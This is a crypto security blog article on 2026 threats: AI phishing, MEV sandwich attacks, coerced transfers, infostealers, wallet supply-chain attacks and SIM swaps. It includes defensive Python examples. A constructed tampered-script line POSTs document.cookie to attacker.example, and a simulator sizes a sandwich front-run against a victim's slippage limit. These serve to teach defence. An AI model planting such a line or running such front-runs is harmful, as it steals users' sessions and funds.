Web3 Security · April 2026 · 8 min read

The 2026 Crypto Threat Report: What Has Changed

AI-driven fraud is up 1,400%. Blockchain Extractable Value attacks have drained $540M. Physical wrench attacks are up 75%. Here is what you need to know, and how to protect yourself, going into the second half of 2026.

The threat environment for crypto holders has shifted significantly since 2023. The attack categories are not new - phishing, social engineering, malware, physical theft - but the scale and sophistication have changed. Three specific trends deserve attention in 2026: AI-driven fraud at scale, Blockchain Extractable Value attacks on DeFi, and a documented rise in physical attacks targeting known holders.

AI-Driven Fraud: Scale Changed Everything

The FBI's 2025 Internet Crime Report noted a 1,400% increase in AI-assisted fraud complaints compared to 2022 baseline figures. “AI-assisted” in this context means attackers are using language models to generate phishing emails without the grammatical errors that made them detectable, voice cloning to impersonate exchange support staff over phone calls, and deepfake video to impersonate executives in targeted attacks on corporate treasury wallets.

The quality filter that previously caught most phishing - broken English, generic salutations, suspicious formatting - no longer applies. AI-generated phishing passes grammar checks and can be personalized at scale using data scraped from social media and LinkedIn. An attacker who knows your exchange, your approximate holdings, and your name can generate a convincing “unusual sign-in detected” email that matches the exact formatting of your actual exchange's communications.

AI Threat Vector: Voice Cloning Impersonation (Active)

Attackers clone voices of known individuals using 3-30 seconds of audio from public sources (YouTube, podcasts, conference talks). They then call targets claiming to be exchange compliance staff, a family member who lost their phone, or a business partner. The voice matches. The emotional urgency triggers action before the target thinks critically. Always verify through a second channel - call back on a known number, not one provided in the call.

AI Threat Vector: Personalized Phishing at Scale (Active)

Mass phishing used to be obviously generic. AI tooling allows attackers to pull public data (exchange of choice, NFT holdings, DeFi activity via on-chain data) and generate personalized emails for thousands of targets per hour. If your wallet address is publicly linked to your identity, your on-chain activity is a targeting database.

The Old Detection Signals No Longer Work

“I can tell a phishing email because it looks wrong” is not a reliable defense in 2026. AI-generated phishing looks right. The defense is process: bookmark your exchanges, verify unexpected requests through a second channel, and never act under urgency created by an unsolicited communication.

Blockchain Extractable Value: $540M in 2025

Blockchain Extractable Value (BEV, sometimes called MEV - Miner/Maximal Extractable Value) refers to profit extracted by reordering, inserting, or censoring transactions within a block. This is not hacking in the traditional sense - it operates within the rules of the protocol. But the economic impact on ordinary DeFi users is real.

Flashbots Research and other monitoring organizations tracked approximately $540M in BEV extraction on Ethereum in 2025, down from the 2021 peak but sustained at high levels. The most common forms are sandwich attacks (where a bot detects your pending large swap, front-runs it to move the price, and back-runs it to profit from the slippage it caused), and liquidation MEV (where bots compete to be first to liquidate undercollateralized positions in lending protocols).

For ordinary users, the first defense is the slippage tolerance setting. The minimum output you accept is the bound on what a sandwich can take from you, so raising maximum slippage above 0.5-1% on a large swap directly raises your exposure: a bot will push the price to just above your limit and no further, because a reverting victim transaction earns it nothing. The second defense is keeping the transaction out of the public mempool. Private order-flow services like MEV Blocker (mevblocker.io) and Flashbots Protect (protect.flashbots.net) are used by pointing your wallet at their RPC endpoint; they forward your transaction to block builders directly instead of broadcasting it, so sandwich bots never see it pending. The trade-off of a tight limit is that a volatile pair may move on its own and the swap reverts, and a reverted swap still costs gas.

BEV Attack Type: Sandwich Attack on DEX Trades (share of the $540M/yr BEV total)

Bot detects your large pending swap in the public mempool. It submits a transaction with higher gas to buy before you (pushing price up), lets your trade execute at the worse price, then sells immediately after. You receive fewer tokens than expected. The slippage shows up as an unexplained bad execution price. Use MEV-protected RPC endpoints for trades above $1,000 to reduce this exposure.
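The mechanics above are easiest to see with numbers. The following is an added example, not code from the article: a constant-product AMM (x * y = k with a 0.3% fee, as in Uniswap v2) in which an attacker front-runs a victim swap by the largest amount that still leaves the victim's transaction above its minimum output, then back-runs it. The pool sizes (20,000,000 USDC / 10,000 ETH) and the victim trade (100,000 USDC) are constructed for illustration. Run it and the effect of the slippage setting falls out directly: the attacker's take is capped by the victim's tolerance.

```python
"""Sandwich attack on a constant-product AMM (x * y = k with a 0.3% fee, as in
Uniswap v2). Added example: the pool sizes and the victim trade are constructed
for illustration and are not figures from the article."""

FEE = 0.003  # 0.3% per swap, charged on the input side


def swap_out(reserve_in: float, reserve_out: float, amount_in: float) -> float:
    """Output amount for a swap of amount_in, holding reserve_in * reserve_out constant."""
    amount_in_after_fee = amount_in * (1 - FEE)
    return reserve_out * amount_in_after_fee / (reserve_in + amount_in_after_fee)


def frontrun_size(reserve_in, reserve_out, victim_in, victim_min_out):
    """Largest attacker buy (same direction as the victim) that still leaves the
    victim's swap at or above its minimum output, so the victim's tx does not
    revert. Bisection; a real bot uses the closed form and gets the same answer.
    This is the upper bound on size; a bot may stop earlier if fees make the
    marginal size unprofitable."""
    lo, hi = 0.0, reserve_in  # hi: buying against the whole reserve is never feasible
    for _ in range(200):
        mid = (lo + hi) / 2
        bought = swap_out(reserve_in, reserve_out, mid)
        victim_out = swap_out(reserve_in + mid, reserve_out - bought, victim_in)
        if victim_out >= victim_min_out:
            lo = mid
        else:
            hi = mid
    return lo


def sandwich(reserve_in, reserve_out, victim_in, slippage_tolerance):
    """Simulate front-run -> victim swap -> back-run. Returns what the victim was
    quoted, what they received, and the attacker's net profit in the input token."""
    quoted = swap_out(reserve_in, reserve_out, victim_in)
    min_out = quoted * (1 - slippage_tolerance)  # the wallet's minAmountOut

    attacker_in = frontrun_size(reserve_in, reserve_out, victim_in, min_out)
    # 1. Front-run: attacker buys first, pushing the price up.
    attacker_got = swap_out(reserve_in, reserve_out, attacker_in)
    r_in, r_out = reserve_in + attacker_in, reserve_out - attacker_got
    # 2. Victim's swap executes at the worse price, just above minAmountOut.
    victim_out = swap_out(r_in, r_out, victim_in)
    r_in, r_out = r_in + victim_in, r_out - victim_out
    # 3. Back-run: attacker sells what it bought into the now-higher price.
    attacker_back = swap_out(r_out, r_in, attacker_got)
    return {
        "victim_quoted": quoted,
        "victim_received": victim_out,
        "victim_loss": quoted - victim_out,
        "attacker_in": attacker_in,
        "attacker_profit": attacker_back - attacker_in,
    }


if __name__ == "__main__":
    # Constructed pool: 20,000,000 USDC / 10,000 ETH; victim buys ETH with 100,000 USDC.
    for tol in (0.05, 0.01, 0.005, 0.001):
        r = sandwich(20_000_000.0, 10_000.0, 100_000.0, tol)
        print(f"tolerance {tol:.1%}: victim gets {r['victim_received']:.4f} ETH "
              f"of {r['victim_quoted']:.4f} quoted; attacker nets "
              f"{r['attacker_profit']:,.0f} USDC using {r['attacker_in']:,.0f} USDC")
```

The victim's loss never exceeds the tolerance they set, and the attacker's profit shrinks with it; at 0.1% the bot is working for a few tens of USDC on a 100,000 USDC trade, at 1% for a few hundred. Routing the same trade through a private RPC removes the attacker's step 1 entirely, since there is no pending transaction to see.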

Physical Attacks: Up 75% Since 2023

The Jameson Lopp “Known Physical Bitcoin Attacks” database, which has tracked documented physical attacks on crypto holders since 2014, recorded a 75% increase in incidents between 2023 and 2025. The attacks range from home invasions where attackers force victims to transfer funds at gunpoint to targeted kidnappings of known high-net-worth individuals identified through public wallet data or social media.

The reason is straightforward: as crypto prices increased and on-chain data became easier to analyze, the financial profile of many holders became public knowledge. An attacker who knows your name, your approximate holdings (from your public wallet), and your address has everything needed to plan a physical attack. This is not a theoretical threat - documented incidents have occurred across the US, UK, Germany, Brazil, and Southeast Asia.

Physical Threat: Home Invasion and Coerced Transfer (Up 75%)

Attackers research targets through on-chain data, social media disclosures, and address de-anonymization services. They then conduct home invasions and force the victim to transfer funds under duress. The standard countermeasure is the BIP39 passphrase (Trezor calls it a hidden wallet; Ledger can attach it to a second PIN, so one PIN opens the standard wallet and the other the hidden one). The passphrase is mixed into the seed derivation, so the same seed words produce an entirely different set of keys with it than without it, and nothing on the device reveals that a second wallet exists. Keep a modest, believable balance in the decoy and the bulk of your holdings in the other; under coercion you surrender only the PIN or passphrase for the decoy. Two caveats: the passphrase has no checksum and cannot be recovered from the seed words, so it must be backed up separately, and a decoy holding a trivially small balance is not convincing.
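To make concrete what "a different wallet from the same seed" means here, and why the priority list at the end says to enable passphrase protection, the following added example (not code from the article or from any wallet vendor) derives the BIP39 seed and the BIP32 master key with the standard library only. The mnemonic is the BIP39 reference test vector, and the passphrases are constructed; `wallet_id` is an illustrative tag for the reader, not a real wallet fingerprint format.

```python
"""BIP39 seed derivation with and without a passphrase, stdlib only. Added
example, not from the article or any wallet vendor; the mnemonic is the BIP39
reference test vector and the passphrases are constructed."""
import hashlib
import hmac
import unicodedata


def bip39_seed(mnemonic: str, passphrase: str = "") -> bytes:
    """seed = PBKDF2-HMAC-SHA512(NFKD(mnemonic), "mnemonic" + NFKD(passphrase),
    2048 rounds, 64 bytes). The passphrase is salt, so every distinct value
    yields an unrelated seed and there is no "wrong passphrase" error."""
    words = unicodedata.normalize("NFKD", mnemonic).encode("utf-8")
    salt = ("mnemonic" + unicodedata.normalize("NFKD", passphrase)).encode("utf-8")
    return hashlib.pbkdf2_hmac("sha512", words, salt, 2048, dklen=64)


def bip32_master_key(seed: bytes) -> tuple:
    """BIP32 master node: HMAC-SHA512(key=b"Bitcoin seed", seed) -> (private key, chain code).
    Every account and address in the wallet descends from this pair."""
    digest = hmac.new(b"Bitcoin seed", seed, hashlib.sha512).digest()
    return digest[:32], digest[32:]


def wallet_id(mnemonic: str, passphrase: str = "") -> str:
    """Short hex tag of the master private key, to show which wallet a passphrase
    lands you in. Illustrative only; not a real wallet fingerprint format."""
    key, _ = bip32_master_key(bip39_seed(mnemonic, passphrase))
    return key[:4].hex()


# BIP39 English test vector #1 (public, holds nothing; never reuse it).
TEST_MNEMONIC = ("abandon abandon abandon abandon abandon abandon "
                 "abandon abandon abandon abandon abandon about")

if __name__ == "__main__":
    # Constructed passphrases: note that a trailing space or a case change is a
    # different wallet, which is why the passphrase needs its own backup.
    for pw in ("", "TREZOR", "TREZOR ", "trezor", "correct horse"):
        print(f"passphrase {pw!r:16} -> wallet {wallet_id(TEST_MNEMONIC, pw)}")
```

The standard (no-passphrase) wallet and the passphrase wallet share the 24 words and nothing else. Whoever holds the words plus the PIN gets the decoy; only the words plus the exact passphrase reach the rest, and a passphrase that is one character off silently opens an empty wallet rather than failing.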

Malware Targeting Crypto Users

Crypto-targeting malware has become more specialized. Clipboard hijackers that replace copied wallet addresses have existed for years, but 2024-2025 saw the rise of wallet-specific infostealer malware that specifically targets MetaMask vault files, Ledger Live data, and seed phrase files stored on disk.

The Lumma Stealer and Atomic Stealer families, both active in 2025, specifically search for strings matching BIP39 wordlist patterns in text files, screenshots, and clipboard history. If you photographed your seed phrase and the photo is in iCloud Photos, or you typed it into a notes app, these stealers will find it.

Malware Threat: Infostealer Targeting BIP39 Seed Phrases (Active 2025)

Lumma Stealer and similar tools specifically search victim machines for BIP39 seed phrase patterns in text files, images (via OCR), and clipboard history. Malware is delivered through malicious ads, cracked software, and fake software downloads. Never type or photograph your seed phrase on any internet-connected device. Physical paper or metal storage only.

Supply Chain Attacks on Wallet Software

The December 2023 Ledger Connect Kit compromise remains the clearest recent example of a supply chain attack targeting crypto users. An attacker gained access to a former Ledger employee's npm account and pushed a malicious version of the Ledger Connect Kit library, which is loaded by many DeFi frontends. The malicious code ran a drainer against connected wallets for several hours before detection.

The Ledger hardware itself was not compromised. The malicious code ran in the user's browser, inside the DeFi frontend that loaded the library, and presented drainer transactions to whatever wallet was connected; anyone who approved those transactions was affected, whichever wallet they used. Hardware wallet users who read the transaction details on the device screen before confirming would have seen an unfamiliar destination address or an approval they had not asked for. This is why verifying transaction details on the hardware wallet screen - not your computer screen - matters: the computer screen is drawn by the same page that is trying to rob you.
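For the frontend operator, the lesson is about how the library is fetched. Connect Kit reached most sites through a small loader that pulled the library from a CDN at runtime, so even a site that had pinned its npm dependency picked up the malicious version the moment it was published. The browser's defense for a CDN-hosted script is Subresource Integrity: pin the exact version in the URL and put the hash of the reviewed file in the `integrity` attribute, and a re-published file with different bytes is refused. The following added example (not the article's code, not Ledger's) builds and checks that attribute; the bundle contents, the URL and the drainer line are constructed stand-ins.

```python
"""Subresource Integrity for a CDN-loaded wallet library. Added example: the
bundle contents, the CDN URL and the drainer line are constructed for
illustration and are not real artifacts."""
import base64
import hashlib
import hmac

STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}  # the only algorithms SRI recognises


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Build one integrity token: '<algo>-<base64 digest>'."""
    if algo not in STRENGTH:
        raise ValueError(f"{algo} is not an SRI algorithm")
    return f"{algo}-{base64.b64encode(hashlib.new(algo, content).digest()).decode()}"


def verify_sri(content: bytes, integrity: str) -> bool:
    """Apply the browser's rule from the SRI spec: keep only tokens with a
    recognised algorithm, use just the strongest algorithm present, and pass
    if any token of that algorithm matches. If no token is recognised the
    browser treats the attribute as absent and LOADS the resource, so a typo in
    the algorithm name silently disables the check. Mirrored here on purpose."""
    by_algo = {}
    for token in integrity.split():
        algo, sep, digest = token.partition("-")
        if sep and algo in STRENGTH:
            by_algo.setdefault(algo, []).append(digest)
    if not by_algo:
        return True  # browser behaviour: unusable metadata == no integrity check
    strongest = max(by_algo, key=STRENGTH.__getitem__)
    actual = base64.b64encode(hashlib.new(strongest, content).digest()).decode()
    return any(hmac.compare_digest(actual, d) for d in by_algo[strongest])


def script_tag(url: str, content: bytes) -> str:
    """The tag a frontend should ship for a version-pinned, CDN-hosted dependency."""
    return (f'<script src="{url}" integrity="{sri_hash(content, "sha384")}" '
            f'crossorigin="anonymous"></script>')


# Constructed stand-ins for a reviewed release and a tampered re-publish.
GOOD_BUNDLE = b"export function connect(w){ return w.request({method:'eth_requestAccounts'}); }\n"
TAMPERED_BUNDLE = GOOD_BUNDLE + b"fetch('https://attacker.example/c',{method:'POST',body:document.cookie});\n"
PINNED_URL = "https://cdn.example.com/npm/wallet-connect-kit@1.2.3/dist/umd/index.js"  # hypothetical

if __name__ == "__main__":
    tag = script_tag(PINNED_URL, GOOD_BUNDLE)
    print(tag)
    integrity = tag.split('integrity="')[1].split('"')[0]
    print("reviewed release loads:", verify_sri(GOOD_BUNDLE, integrity))
    print("tampered release loads:", verify_sri(TAMPERED_BUNDLE, integrity))
```

SRI only helps when the URL names a fixed version; against a "latest" URL the hash breaks on every legitimate update, which is the point: a new version should not reach your users until someone has looked at it. It does nothing for a loader that fetches further code itself, so that pattern has to go as well.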

SIM Swap Attacks on Exchange Accounts

SIM swap fraud - convincing a mobile carrier to transfer a victim's phone number to an attacker-controlled SIM card - remains the dominant method for bypassing SMS two-factor authentication on exchange accounts. The FTC received over 15,000 SIM swap complaints in 2023 and the number has increased annually.

Exchanges that only offer SMS 2FA are still common. The fix is to use a hardware security key (YubiKey) or an authenticator app (Google Authenticator, Authy) instead of SMS wherever available. Exchanges that support FIDO2 hardware keys include Coinbase, Kraken, and Gemini. Prefer the key where it is offered: an authenticator code defeats SIM swapping because the carrier is never involved, but it can still be relayed in real time by the kind of convincing phishing page described above, whereas a FIDO2 key binds its response to the real domain and cannot be replayed elsewhere. For exchanges where you must use SMS 2FA, adding a carrier account PIN that must be verified before any SIM change or port-out request is the minimum mitigation; also check that the exchange's account recovery flow does not fall back to SMS and undo the work.
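The reason an authenticator app is immune to a SIM swap is visible in what it computes. The following added example (not the article's code) implements HOTP and TOTP (RFC 4226 and RFC 6238) with the standard library, using the RFC test-vector key: the code is an HMAC over a shared secret and the current 30-second counter, produced entirely on the phone and checked entirely on the server, so the carrier never touches it. The server-side `verify_totp` with a small clock-skew window is the part most people get wrong.

```python
"""HOTP/TOTP (RFC 4226 / RFC 6238) with the standard library, to show what an
authenticator app computes and why a SIM swap cannot reach it. Added example,
not the article's code; the secret is the RFC test-vector key."""
import base64
import hmac
import struct
import time
from typing import Optional


def hotp(secret: bytes, counter: int, digits: int = 6, algo: str = "sha1") -> str:
    """RFC 4226: HMAC(secret, counter) -> dynamic truncation -> decimal code."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    binary = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(binary % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: Optional[float] = None, step: int = 30,
         digits: int = 6, algo: str = "sha1") -> str:
    """RFC 6238: HOTP with counter = floor(unix_time / step). Nothing here
    depends on a phone number; only the secret and the clock."""
    now = time.time() if at is None else at
    return hotp(secret, int(now) // step, digits, algo)


def verify_totp(secret: bytes, code: str, at: Optional[float] = None,
                step: int = 30, skew: int = 1) -> bool:
    """Server-side check allowing +-skew steps of clock drift, constant-time
    compare. A relay-phishing page only has to forward the code inside this
    window, which is the residual weakness FIDO2 closes."""
    now = time.time() if at is None else at
    counter = int(now) // step
    return any(hmac.compare_digest(hotp(secret, counter + d, len(code)), code)
               for d in range(-skew, skew + 1))


def secret_from_base32(text: str) -> bytes:
    """Authenticator apps receive the secret as base32 (otpauth:// URI / QR code)."""
    cleaned = text.replace(" ", "").upper()
    cleaned += "=" * (-len(cleaned) % 8)  # restore padding the URI form drops
    return base64.b32decode(cleaned)


RFC_SECRET = b"12345678901234567890"  # RFC 4226 / RFC 6238 SHA-1 test key

if __name__ == "__main__":
    for t in (59, 1111111109, 1234567890):
        print(f"T={t}: {totp(RFC_SECRET, t, digits=8)}")  # RFC 6238 Appendix B values
    code = totp(RFC_SECRET, 1000)
    print("accepted 29 s later:", verify_totp(RFC_SECRET, code, at=1029))
    print("accepted 100 s later:", verify_totp(RFC_SECRET, code, at=1100))
```

The enrolment QR code is that base32 secret; anyone who photographs it, or the screenshot of it in cloud photo storage, has the same generator the phone does, which is the same storage rule as for a seed phrase.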

2026 Defensive Priority List

Eliminate SMS 2FA on all exchange accounts - replace with an authenticator app or hardware key. Use MEV-protected RPC for large DEX trades. Never link your real identity to your primary holding wallet publicly. Enable passphrase protection on your hardware wallet to create a hidden wallet for duress scenarios. Store seed phrases offline on metal, never digital.